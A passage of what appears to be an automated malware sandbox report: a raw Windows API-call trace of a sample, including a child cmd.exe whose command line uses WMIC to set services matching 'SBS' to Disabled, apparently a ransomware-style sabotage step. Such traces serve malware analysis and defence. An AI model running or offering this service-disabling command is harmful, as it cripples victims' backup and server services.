lpProcName="ResolveDelayLoadsFromDll") returned 0x76aa0770 [0122.927] ResolveDelayLoadedAPI () returned 0x77138200 [0122.927] CoCreateInstance (in: rclsid=0x74043548*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74043528*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0xb4b2e4 | out: ppv=0xb4b2e4*=0x964880) returned 0x0 [0122.928] IUnknown:AddRef (This=0x964880) returned 0x2 [0122.928] GetCurrentProcessId () returned 0xca4 [0122.928] GetCurrentThreadId () returned 0xca0 [0122.928] GetTickCount () returned 0x25308 [0122.928] ISystemDebugEventFire:BeginSession (This=0x964880, guidSourceID=0x74042fb8, strSessionName="VBScript:00003236:00003232:18152328") returned 0x0 [0122.928] GetCurrentThreadId () returned 0xca0 [0122.936] GetUserDefaultLCID () returned 0x409 [0122.936] GetACP () returned 0x4e4 [0122.936] ISystemDebugEventFire:EndSession (This=0x964880) returned 0x0 [0122.936] IUnknown:Release (This=0x964880) returned 0x1 [0122.936] IUnknown:Release (This=0x964880) returned 0x0 [0122.936] XSLTemplate:IXSLTemplate:createProcessor (in: This=0x1026328, ppProcessor=0x88f9e8 | out: ppProcessor=0x88f9e8*=0x1024ec0) returned 0x0 [0122.937] FreeThreadedDOMDocument:IUnknown:AddRef (This=0x1024c18) returned 0x2 [0122.937] IXSLProcessor:put_input (This=0x1024ec0, input=0x88f8f8*(varType=0x9, wReserved1=0x88, wReserved2=0xf9b0, wReserved3=0x88, varVal1=0x1024c18, varVal2=0x71f2a248)) returned 0x0 [0122.937] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0122.937] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3c, lpConsoleScreenBufferInfo=0x88f8ac | out: lpConsoleScreenBufferInfo=0x88f8ac) returned 1 [0122.937] IXSLProcessor:transform (in: This=0x1024ec0, pDone=0x88f9e4 | out: pDone=0x88f9e4*=0xffff) returned 0x0 [0122.988] GetCurrentThreadId () returned 0xca0 [0122.988] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0122.988] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x88f77c, cchData=6 | out: lpLCData="1252") returned 5 [0122.988] IsValidCodePage (CodePage=0x4e4) returned 1 [0122.988] CoCreateInstance (in: rclsid=0x74043548*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74043528*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0xb4b2e4 | out: ppv=0xb4b2e4*=0x964400) returned 0x0 [0122.988] IUnknown:AddRef (This=0x964400) returned 0x2 [0122.988] GetCurrentProcessId () returned 0xca4 [0122.988] GetCurrentThreadId () returned 0xca0 [0122.988] GetTickCount () returned 0x25337 [0122.988] ISystemDebugEventFire:BeginSession (This=0x964400, guidSourceID=0x74042fb8, strSessionName="VBScript:00003236:00003232:18152375") returned 0x0 [0122.988] GetCurrentThreadId () returned 0xca0 [0122.988] XSLTemplate:IUnknown:Release (This=0x1024f38) returned 0x2 [0122.988] XSLTemplate:IUnknown:AddRef (This=0x1024f38) returned 0x3 [0122.988] XSLTemplate:IUnknown:Release (This=0x1024f38) returned 0x2 [0122.988] ISystemDebugEventFire:IsActive (This=0x964400) returned 0x1 [0122.989] XSLTemplate:IUnknown:AddRef (This=0x1024f38) returned 0x3 [0123.262] ISystemDebugEventFire:IsActive (This=0x964400) returned 0x1 [0123.262] GetCurrentThreadId () returned 0xca0 [0123.262] XSLTemplate:IUnknown:Release (This=0x1024f38) returned 0x3 [0123.262] XSLTemplate:IUnknown:Release (This=0x1024f38) returned 0x2 [0123.262] GetCurrentThreadId () returned 0xca0 [0123.263] ISystemDebugEventFire:IsActive (This=0x964400) returned 0x1 [0123.263] XSLTemplate:IUnknown:AddRef (This=0x1024f38) returned 0x3 [0123.263] XSLTemplate:IUnknown:AddRef (This=0x1024f38) returned 0x4 [0123.263] ISystemDebugEventFire:IsActive (This=0x964400) returned 0x1 [0123.263] GetCurrentThreadId () returned 0xca0 [0123.264] ISystemDebugEventFire:IsActive (This=0x964400) returned 0x1 [0123.264] XSLTemplate:IUnknown:AddRef (This=0x1024f38) returned 0x3 [0123.264] XSLTemplate:IUnknown:AddRef (This=0x1024f38) returned 0x4 [0123.264] ISystemDebugEventFire:IsActive (This=0x964400) returned 0x1 [0123.264] GetCurrentThreadId () returned 0xca0 [0123.265] GetCurrentThreadId () returned 0xca0 [0123.265] IUnknown:Release (This=0x964400) returned 0x1 [0123.265] GetUserDefaultLCID () returned 0x409 [0123.265] GetACP () returned 0x4e4 [0123.265] XSLTemplate:IUnknown:Release (This=0x1024f38) returned 0x1 [0123.277] ISystemDebugEventFire:EndSession (This=0x964400) returned 0x0 [0123.277] IUnknown:Release (This=0x964400) returned 0x0 [0123.277] IXSLProcessor:get_output (in: This=0x1024ec0, pOutput=0x88f970 | out: pOutput=0x88f970*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\r\n", varVal2=0x0)) returned 0x0 [0123.277] IUnknown:Release (This=0x1024ec0) returned 0x0 [0123.277] FreeThreadedDOMDocument:IUnknown:Release (This=0x10267b8) returned 0x2 [0123.277] XSLTemplate:IUnknown:Release (This=0x1026328) returned 0x0 [0123.278] GetProcAddress (hModule=0x74030000, lpProcName="AmsiUninitialize") returned 0x74033f20 [0123.278] AmsiUninitialize () returned 0x1 [0123.278] FreeLibrary (hLibModule=0x74030000) returned 1 [0123.278] ??1CHString@@QAE@XZ () returned 0x74a66430 [0123.278] __iob_func () returned 0x77ac1208 [0123.278] fprintf (in: _File=0x77ac1228, _Format="%s" | out: _File=0x77ac1228) returned 2 [0123.279] __iob_func () returned 0x77ac1208 [0123.279] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0123.279] LoadStringW (in: hInstance=0x0, uID=0xafd2, lpBuffer=0xb4be60, cchBufferMax=1024 | out: lpBuffer="\r\n") returned 0x2 [0123.279] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0123.279] __iob_func () returned 0x77ac1208 [0123.279] fprintf (in: _File=0x77ac1228, _Format="%s" | out: _File=0x77ac1228) returned 2 [0123.280] __iob_func () returned 0x77ac1208 [0123.280] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0123.280] ??1CHString@@QAE@XZ () returned 0x74a66430 [0123.280] ??1CHString@@QAE@XZ () returned 0x1 [0123.280] FreeThreadedDOMDocument:IUnknown:Release (This=0x1024c18) returned 0x0 [0123.280] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0123.280] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0123.280] WbemObjectTextSrc:IUnknown:Release (This=0x962868) returned 0x0 [0123.280] IUnknown:Release (This=0x9455d8) returned 0x0 [0123.280] WbemLocator:IUnknown:Release (This=0x943428) returned 0x2 [0123.280] IUnknown:Release (This=0x960720) returned 0x0 [0123.281] IUnknown:Release (This=0x960db0) returned 0x0 [0123.281] WbemLocator:IUnknown:Release (This=0x943428) returned 0x1 [0123.281] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0123.281] WbemLocator:IUnknown:Release (This=0x943428) returned 0x0 [0123.281] CoUninitialize () [0123.281] DllCanUnloadNow () returned 0x0 [0123.305] exit (_Code=-2147217385) [0123.305] ??1CHString@@QAE@XZ () returned 0x74a66430 [0123.305] ??1CHString@@QAE@XZ () returned 0x74a66430 Thread: id = 323 os_tid = 0xc90 Thread: id = 324 os_tid = 0xc9c Thread: id = 325 os_tid = 0xc98 Thread: id = 326 os_tid = 0xc8c Process: id = "76" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0xca77000" os_pid = "0xc6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c WMIC SERVICE WHERE 'caption LIKE '%SBS%'' CALL ChangeStartMode 'Disabled'" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4972 start_va = 0x180000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 4973 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 4974 start_va = 0x1b0000 end_va = 0x1c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4975 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4976 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 4977 start_va = 0x310000 end_va = 0x313fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 4978 start_va = 0x320000 end_va = 0x320fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 4979 start_va = 0x330000 end_va = 0x331fff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 4980 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 4981 start_va = 0x410000 end_va = 0x440ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 4982 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4983 start_va = 0x7e380000 end_va = 0x7e3a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e380000" filename = "" Region: id = 4984 start_va = 0x7e3a8000 end_va = 0x7e3aafff entry_point = 0x0 region_type = private name = "private_0x000000007e3a8000" filename = "" Region: id = 4985 start_va = 0x7e3ab000 end_va = 0x7e3abfff entry_point = 0x0 region_type = private name = "private_0x000000007e3ab000" filename = "" Region: id = 4986 start_va = 0x7e3ad000 end_va = 0x7e3adfff entry_point = 0x0 region_type = private name = "private_0x000000007e3ad000" filename = "" Region: id = 4987 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4988 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4989 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 4990 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4991 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 4992 start_va = 0x4540000 end_va = 0x454ffff entry_point = 0x0 region_type = private name = "private_0x0000000004540000" filename = "" Region: id = 4993 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4994 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4995 start_va = 0x4420000 end_va = 0x451ffff entry_point = 0x0 region_type = private name = "private_0x0000000004420000" filename = "" Region: id = 4996 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5037 start_va = 0x180000 end_va = 0x18ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 5038 start_va = 0x190000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 5039 start_va = 0x340000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 5040 start_va = 0x4550000 end_va = 0x460dfff entry_point = 0x4550000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5041 start_va = 0x4610000 end_va = 0x470ffff entry_point = 0x0 region_type = private name = "private_0x0000000004610000" filename = "" Region: id = 5042 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5043 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5044 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5045 start_va = 0x7e280000 end_va = 0x7e37ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e280000" filename = "" Region: id = 5046 start_va = 0x7e3a5000 end_va = 0x7e3a7fff entry_point = 0x0 region_type = private name = "private_0x000000007e3a5000" filename = "" Region: id = 5047 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 5048 start_va = 0x380000 end_va = 0x383fff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 5049 start_va = 0x4710000 end_va = 0x4a46fff entry_point = 0x4710000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 328 os_tid = 0xc7c [0123.515] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0123.515] __set_app_type (_Type=0x1) [0123.515] __p__fmode () returned 0x77ac4d6c [0123.515] __p__commode () returned 0x77ac5b1c [0123.515] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0123.515] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0123.515] GetCurrentThreadId () returned 0xc7c [0123.515] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc7c) returned 0x84 [0123.516] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0123.516] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0123.516] SetThreadUILanguage (LangId=0x0) returned 0x409 [0123.518] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0123.518] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fc88 | out: phkResult=0x30fc88*=0x0) returned 0x2 [0123.518] VirtualQuery (in: lpAddress=0x30fc8f, lpBuffer=0x30fc40, dwLength=0x1c | out: lpBuffer=0x30fc40*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0123.518] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30fc40, dwLength=0x1c | out: lpBuffer=0x30fc40*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0123.518] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30fc40, dwLength=0x1c | out: lpBuffer=0x30fc40*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0123.518] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30fc40, dwLength=0x1c | out: lpBuffer=0x30fc40*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0123.518] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30fc40, dwLength=0x1c | out: lpBuffer=0x30fc40*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0123.518] GetConsoleOutputCP () returned 0x1b5 [0123.518] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0123.519] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0123.519] _get_osfhandle (_FileHandle=1) returned 0x3c [0123.519] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0123.519] _get_osfhandle (_FileHandle=1) returned 0x3c [0123.519] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0123.519] _get_osfhandle (_FileHandle=1) returned 0x3c [0123.519] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0123.519] _get_osfhandle (_FileHandle=0) returned 0x38 [0123.519] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0123.519] _get_osfhandle (_FileHandle=0) returned 0x38 [0123.519] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0123.520] GetEnvironmentStringsW () returned 0x4427df8* [0123.520] FreeEnvironmentStringsA (penv="A") returned 1 [0123.520] GetEnvironmentStringsW () returned 0x4427df8* [0123.520] FreeEnvironmentStringsA (penv="A") returned 1 [0123.520] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ebec | out: phkResult=0x30ebec*=0x94) returned 0x0 [0123.520] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ebf0, lpData=0x30ebf8, lpcbData=0x30ebf4*=0x1000 | out: lpType=0x30ebf0*=0x0, lpData=0x30ebf8*=0x98, lpcbData=0x30ebf4*=0x1000) returned 0x2 [0123.520] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ebf0, lpData=0x30ebf8, lpcbData=0x30ebf4*=0x1000 | out: lpType=0x30ebf0*=0x4, lpData=0x30ebf8*=0x1, lpcbData=0x30ebf4*=0x4) returned 0x0 [0123.520] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ebf0, lpData=0x30ebf8, lpcbData=0x30ebf4*=0x1000 | out: lpType=0x30ebf0*=0x0, lpData=0x30ebf8*=0x1, lpcbData=0x30ebf4*=0x1000) returned 0x2 [0123.520] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ebf0, lpData=0x30ebf8, lpcbData=0x30ebf4*=0x1000 | out: lpType=0x30ebf0*=0x4, lpData=0x30ebf8*=0x0, lpcbData=0x30ebf4*=0x4) returned 0x0 [0123.520] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ebf0, lpData=0x30ebf8, lpcbData=0x30ebf4*=0x1000 | out: lpType=0x30ebf0*=0x4, lpData=0x30ebf8*=0x40, lpcbData=0x30ebf4*=0x4) returned 0x0 [0123.520] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ebf0, lpData=0x30ebf8, lpcbData=0x30ebf4*=0x1000 | out: lpType=0x30ebf0*=0x4, lpData=0x30ebf8*=0x40, lpcbData=0x30ebf4*=0x4) returned 0x0 [0123.520] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ebf0, lpData=0x30ebf8, lpcbData=0x30ebf4*=0x1000 | out: lpType=0x30ebf0*=0x0, lpData=0x30ebf8*=0x40, lpcbData=0x30ebf4*=0x1000) returned 0x2 [0123.520] RegCloseKey (hKey=0x94) returned 0x0 [0123.520] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ebec | out: phkResult=0x30ebec*=0x94) returned 0x0 [0123.520] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ebf0, lpData=0x30ebf8, lpcbData=0x30ebf4*=0x1000 | out: lpType=0x30ebf0*=0x0, lpData=0x30ebf8*=0x40, lpcbData=0x30ebf4*=0x1000) returned 0x2 [0123.520] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ebf0, lpData=0x30ebf8, lpcbData=0x30ebf4*=0x1000 | out: lpType=0x30ebf0*=0x4, lpData=0x30ebf8*=0x1, lpcbData=0x30ebf4*=0x4) returned 0x0 [0123.520] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ebf0, lpData=0x30ebf8, lpcbData=0x30ebf4*=0x1000 | out: lpType=0x30ebf0*=0x0, lpData=0x30ebf8*=0x1, lpcbData=0x30ebf4*=0x1000) returned 0x2 [0123.520] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ebf0, lpData=0x30ebf8, lpcbData=0x30ebf4*=0x1000 | out: lpType=0x30ebf0*=0x4, lpData=0x30ebf8*=0x0, lpcbData=0x30ebf4*=0x4) returned 0x0 [0123.520] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ebf0, lpData=0x30ebf8, lpcbData=0x30ebf4*=0x1000 | out: lpType=0x30ebf0*=0x4, lpData=0x30ebf8*=0x9, lpcbData=0x30ebf4*=0x4) returned 0x0 [0123.520] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ebf0, lpData=0x30ebf8, lpcbData=0x30ebf4*=0x1000 | out: lpType=0x30ebf0*=0x4, lpData=0x30ebf8*=0x9, lpcbData=0x30ebf4*=0x4) returned 0x0 [0123.520] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ebf0, lpData=0x30ebf8, lpcbData=0x30ebf4*=0x1000 | out: lpType=0x30ebf0*=0x0, lpData=0x30ebf8*=0x9, lpcbData=0x30ebf4*=0x1000) returned 0x2 [0123.520] RegCloseKey (hKey=0x94) returned 0x0 [0123.521] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad2982c [0123.521] srand (_Seed=0x5ad2982c) [0123.521] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%SBS%'' CALL ChangeStartMode 'Disabled'" [0123.521] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%SBS%'' CALL ChangeStartMode 'Disabled'" [0123.521] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0123.521] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4429d50, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0123.521] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0123.521] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0123.521] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0123.521] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0123.521] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0123.521] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0123.521] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0123.521] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0123.521] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0123.521] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0123.521] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0123.521] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0123.521] GetEnvironmentStringsW () returned 0x4427df8* [0123.521] FreeEnvironmentStringsA (penv="A") returned 1 [0123.521] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0123.521] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0123.521] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0123.521] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0123.521] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0123.521] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0123.521] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0123.521] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0123.521] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0123.522] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0123.522] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f9c4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0123.522] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x30f9c4, lpFilePart=0x30f9bc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x30f9bc*="Desktop") returned 0x1d [0123.522] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0123.522] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f740 | out: lpFindFileData=0x30f740) returned 0x44205c8 [0123.522] FindClose (in: hFindFile=0x44205c8 | out: hFindFile=0x44205c8) returned 1 [0123.522] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x30f740 | out: lpFindFileData=0x30f740) returned 0x44205c8 [0123.522] FindClose (in: hFindFile=0x44205c8 | out: hFindFile=0x44205c8) returned 1 [0123.522] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0123.522] FindFirstFileW (in: 